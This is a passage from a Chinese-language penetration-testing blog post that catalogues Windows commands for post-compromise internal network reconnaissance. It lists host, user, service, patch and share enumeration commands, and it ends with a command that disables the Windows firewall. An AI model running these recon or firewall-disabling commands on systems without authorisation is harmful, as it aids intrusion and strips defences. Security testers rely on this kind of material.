<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>内网信息收集 - Geekby&#39;s Blog</title><meta name="Description" content="内网信息收集命令手册"><meta property="og:title" content="内网信息收集" />
<meta property="og:description" content="内网信息收集命令手册" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2020/02/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-02-13T12:01:00+08:00" />
<meta property="article:modified_time" content="2020-02-13T12:01:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="内网信息收集"/>
<meta name="twitter:description" content="内网信息收集命令手册"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2020/02/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" /><link rel="prev" href="https://www.geekby.site/2020/02/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E6%B5%81%E7%A8%8B/" /><link rel="next" href="https://www.geekby.site/2020/02/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E9%98%B2%E5%BE%A1%E5%88%86%E6%9E%90/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "内网信息收集",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2020\/02\/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "域安全, 内网渗透, 信息收集","wordcount":  685 ,
        "url": "https:\/\/www.geekby.site\/2020\/02\/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86\/","datePublished": "2020-02-13T12:01:00+08:00","dateModified": "2020-02-13T12:01:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "内网信息收集命令手册"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">内网信息收集</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/"><i class="far fa-folder fa-fw"></i>内网渗透</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2020-02-13">2020-02-13</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 685 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 4 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#收集本机信息">收集本机信息</a>
      <ul>
        <li><a href="#手动信息搜集">手动信息搜集</a>
          <ul>
            <li><a href="#查询网络配置信息">查询网络配置信息</a></li>
            <li><a href="#查询操作系统及软件的信息">查询操作系统及软件的信息</a>
              <ul>
                <li><a href="#查询操作系统和版本信息">查询操作系统和版本信息</a></li>
                <li><a href="#查询系统体系结构">查询系统体系结构</a></li>
                <li><a href="#查看安装的软件版本及路径等">查看安装的软件、版本及路径等</a></li>
              </ul>
            </li>
            <li><a href="#查询本机服务">查询本机服务</a></li>
            <li><a href="#查询进程列表">查询进程列表</a></li>
            <li><a href="#查看启动程序信息">查看启动程序信息</a></li>
            <li><a href="#查看计划任务">查看计划任务</a></li>
            <li><a href="#查看主机开机时间">查看主机开机时间</a></li>
            <li><a href="#查询用户列表">查询用户列表</a></li>
            <li><a href="#列出或断开本地计算机与所连接的客户端之间的会话">列出或断开本地计算机与所连接的客户端之间的会话</a></li>
            <li><a href="#查询端口列表">查询端口列表</a></li>
            <li><a href="#查看补丁列表">查看补丁列表</a></li>
            <li><a href="#查询本机共享列表">查询本机共享列表</a></li>
            <li><a href="#查询路由表及所有可用接口的arp缓存表">查询路由表及所有可用接口的ARP缓存表</a></li>
            <li><a href="#查询防火墙相关配置">查询防火墙相关配置</a>
              <ul>
                <li><a href="#关闭防火墙">关闭防火墙</a></li>
                <li><a href="#修改防火墙配置">修改防火墙配置</a></li>
                <li><a href="#自定义防火墙日志的存储位置">自定义防火墙日志的存储位置</a></li>
              </ul>
            </li>
            <li><a href="#查看代理情况">查看代理情况</a></li>
            <li><a href="#查询并开启远程连接服务">查询并开启远程连接服务</a>
              <ul>
                <li><a href="#查看远程连接端口">查看远程连接端口</a></li>
                <li><a href="#在windows-server2003中开启3389端口">在Windows Server2003中开启3389端口</a></li>
                <li><a href="#在windows-server2008和windows-server2012中开启3389端口">在Windows Server2008和Windows Server2012中开启3389端口</a></li>
              </ul>
            </li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#自动化收集信息">自动化收集信息</a></li>
    <li><a href="#empire下的主机信息搜集">Empire下的主机信息搜集</a>
      <ul>
        <li><a href="#查看本机用户域成员密码设置时间剪切板内容系统基本信息网络适配器信息共享信息">查看本机用户、域成员、密码设置时间、剪切板内容、系统基本信息、网络适配器信息、共享信息</a></li>
      </ul>
    </li>
    <li><a href="#查询当前权限">查询当前权限</a>
      <ul>
        <li><a href="#查询当前权限-1">查询当前权限</a></li>
        <li><a href="#获取域-sid">获取域 SID</a></li>
        <li><a href="#查询指定用户的详细信息">查询指定用户的详细信息</a></li>
      </ul>
    </li>
    <li><a href="#判断是否存在域">判断是否存在域</a>
      <ul>
        <li><a href="#使用-ipconfig-命令">使用 ipconfig 命令</a></li>
        <li><a href="#查看系统详细信息">查看系统详细信息</a></li>
        <li><a href="#查询当前登录域及用户信息">查询当前登录域及用户信息</a></li>
        <li><a href="#判断主域">判断主域</a></li>
      </ul>
    </li>
    <li><a href="#探测内网存活主机">探测内网存活主机</a>
      <ul>
        <li><a href="#利用-netbios-快速探测内网">利用 NetBIOS 快速探测内网</a></li>
        <li><a href="#利用-icmp-协议快速探测内网">利用 ICMP 协议快速探测内网</a></li>
        <li><a href="#通过-arp-扫描探测内网">通过 ARP 扫描探测内网</a>
          <ul>
            <li><a href="#arp-scan工具">arp-scan工具</a></li>
            <li><a href="#empire-中的-arpscan-模块">Empire 中的 ARPscan 模块</a></li>
            <li><a href="#nishang-中的-invoke-arpscanps1-脚本">Nishang 中的 Invoke-ARPScan.ps1 脚本</a></li>
          </ul>
        </li>
        <li><a href="#扫描内网端口">扫描内网端口</a>
          <ul>
            <li><a href="#metasploit-端口扫描">metasploit 端口扫描</a></li>
            <li><a href="#powersploit-的-invoke-portscanps1-脚本">PowerSploit 的 Invoke-portscan.ps1 脚本</a></li>
            <li><a href="#nishang-的-invoke-portscan-模块">Nishang 的 Invoke-PortScan 模块</a></li>
            <li><a href="#端口-banner-信息">端口 banner 信息</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#收集域内基础信息">收集域内基础信息</a>
      <ul>
        <li><a href="#查询域">查询域</a></li>
        <li><a href="#查询域内所有计算机">查询域内所有计算机</a></li>
        <li><a href="#查询域内所有用户列表">查询域内所有用户列表</a></li>
        <li><a href="#查询域内所有成员计算机列表">查询域内所有成员计算机列表</a></li>
        <li><a href="#查询域密码信息">查询域密码信息</a></li>
        <li><a href="#获取域信任信息">获取域信任信息</a></li>
      </ul>
    </li>
    <li><a href="#查找域控制器">查找域控制器</a>
      <ul>
        <li><a href="#查看域控制器的机器名">查看域控制器的机器名</a></li>
        <li><a href="#查看域控制器的主机名">查看域控制器的主机名</a></li>
        <li><a href="#查看当前时间">查看当前时间</a></li>
        <li><a href="#查看域控制器组">查看域控制器组</a></li>
      </ul>
    </li>
    <li><a href="#获取域内的用户和管理员信息">获取域内的用户和管理员信息</a>
      <ul>
        <li><a href="#查询所有域用户列表">查询所有域用户列表</a>
          <ul>
            <li><a href="#向域控服务器进行查询">向域控服务器进行查询</a></li>
            <li><a href="#获取域内用户的详细信息">获取域内用户的详细信息</a></li>
            <li><a href="#查看存在的用户">查看存在的用户</a></li>
            <li><a href="#查询本地管理员组用户">查询本地管理员组用户</a></li>
          </ul>
        </li>
        <li><a href="#查询域管理员用户">查询域管理员用户</a>
          <ul>
            <li><a href="#查询域管理员用户-1">查询域管理员用户</a></li>
            <li><a href="#查询管理员用户">查询管理员用户</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#定位域管理员">定位域管理员</a>
      <ul>
        <li><a href="#常用工具">常用工具</a>
          <ul>
            <li><a href="#pslogonexe">pslogon.exe</a></li>
            <li><a href="#pvefindaduserexe">PVEFindADUser.exe</a></li>
            <li><a href="#netviewexe">netview.exe</a></li>
            <li><a href="#nmap的脚本">nmap的脚本</a></li>
            <li><a href="#powerview脚本">powerview脚本</a></li>
            <li><a href="#empire-的-user_hunter模块">Empire 的 user_hunter模块</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#查找域管进程">查找域管进程</a>
      <ul>
        <li><a href="#本机检查">本机检查</a>
          <ul>
            <li><a href="#获取域管理员列表">获取域管理员列表</a></li>
            <li><a href="#列出本机的所有进程及进程用户">列出本机的所有进程及进程用户</a></li>
          </ul>
        </li>
        <li><a href="#查询域控的域用户会话">查询域控的域用户会话</a></li>
        <li><a href="#查询远程系统中运行的任务">查询远程系统中运行的任务</a></li>
        <li><a href="#扫描远程系统的-netbios-信息">扫描远程系统的 NetBIOS 信息</a></li>
        <li><a href="#bloodhound-工具">BloodHound 工具</a>
          <ul>
            <li><a href="#收集脚本">收集脚本</a></li>
          </ul>
        </li>
      </ul>
    </li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="内网信息收集">内网信息收集</h1>
<h2 id="收集本机信息">收集本机信息</h2>
<h3 id="手动信息搜集">手动信息搜集</h3>
<h4 id="查询网络配置信息">查询网络配置信息</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl">ipconfig /all
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104114.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104114.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104114.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104114.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104114.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104114.png-water_print" /></p>
<h4 id="查询操作系统及软件的信息">查询操作系统及软件的信息</h4>
<h5 id="查询操作系统和版本信息">查询操作系统和版本信息</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl">systeminfo <span class="p">|</span> findstr /B /C:<span class="s2">&#34;OS Name&#34;</span> /C:<span class="s2">&#34;OS Version&#34;</span>
</span></span><span class="line"><span class="cl">systeminfo <span class="p">|</span> findstr /B /C:<span class="s2">&#34;OS 名称&#34;</span> /C:<span class="s2">&#34;OS 版本&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104425.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104425.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104425.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104425.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104425.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104425.png-water_print" /></p>
<h5 id="查询系统体系结构">查询系统体系结构</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl"><span class="k">echo</span> <span class="nv">%PROCESSOR_ARCHITECTURE%</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104648.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104648.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104648.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104648.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104648.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210104648.png-water_print" /></p>
<h5 id="查看安装的软件版本及路径等">查看安装的软件、版本及路径等</h5>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl">wmic product get name, version
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105032.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105032.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105032.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105032.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105032.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105032.png-water_print" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="n">powershell</span> <span class="s2">&#34;Get-WmiObject -class Win32_Product | select-Object -Property name, version&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105022.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105022.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105022.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105022.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105022.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105022.png-water_print" /></p>
<h4 id="查询本机服务">查询本机服务</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl">wmic service list brief
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105233.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105233.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105233.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105233.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105233.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105233.png-water_print" /></p>
<h4 id="查询进程列表">查询进程列表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl">tasklist
</span></span><span class="line"><span class="cl">wmic process list brief
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查看启动程序信息">查看启动程序信息</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bat" data-lang="bat"><span class="line"><span class="cl">wmic startup get command, caption
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105636.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105636.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105636.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105636.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105636.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210105636.png-water_print" /></p>
<h4 id="查看计划任务">查看计划任务</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">schtasks /query /fo LIST /v
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查看主机开机时间">查看主机开机时间</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net statistics workstation
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110134.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110134.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110134.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110134.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110134.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110134.png-water_print" /></p>
<h4 id="查询用户列表">查询用户列表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net user
</span></span><span class="line"><span class="cl">net localgroup administrators
</span></span><span class="line"><span class="cl"># 查询在线用户：
</span></span><span class="line"><span class="cl">query user <span class="p">||</span> qwinsta
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="列出或断开本地计算机与所连接的客户端之间的会话">列出或断开本地计算机与所连接的客户端之间的会话</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net session
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查询端口列表">查询端口列表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netstat -ano
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查看补丁列表">查看补丁列表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">systeminfo
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110618.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110618.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110618.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110618.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110618.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110618.png-water_print" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">wmic qfe get Caption,Description,HotfixID,InstalledOn
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110810.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110810.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110810.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110810.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110810.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110810.png-water_print" /></p>
<h4 id="查询本机共享列表">查询本机共享列表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">net share
</span></span><span class="line"><span class="cl">wmic share get name,path,status
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110936.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110936.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110936.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110936.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110936.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200210110936.png-water_print" /></p>
<h4 id="查询路由表及所有可用接口的arp缓存表">查询路由表及所有可用接口的ARP缓存表</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">route print
</span></span><span class="line"><span class="cl">arp -a
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="查询防火墙相关配置">查询防火墙相关配置</h4>
<h5 id="关闭防火墙">关闭防火墙</h5>
<p>Windows2003之前版本</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">netsh firewall set opmode disable
</span></span></code></pre></td></tr></table>
</div>
</div><p>Windows2003之后版本</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
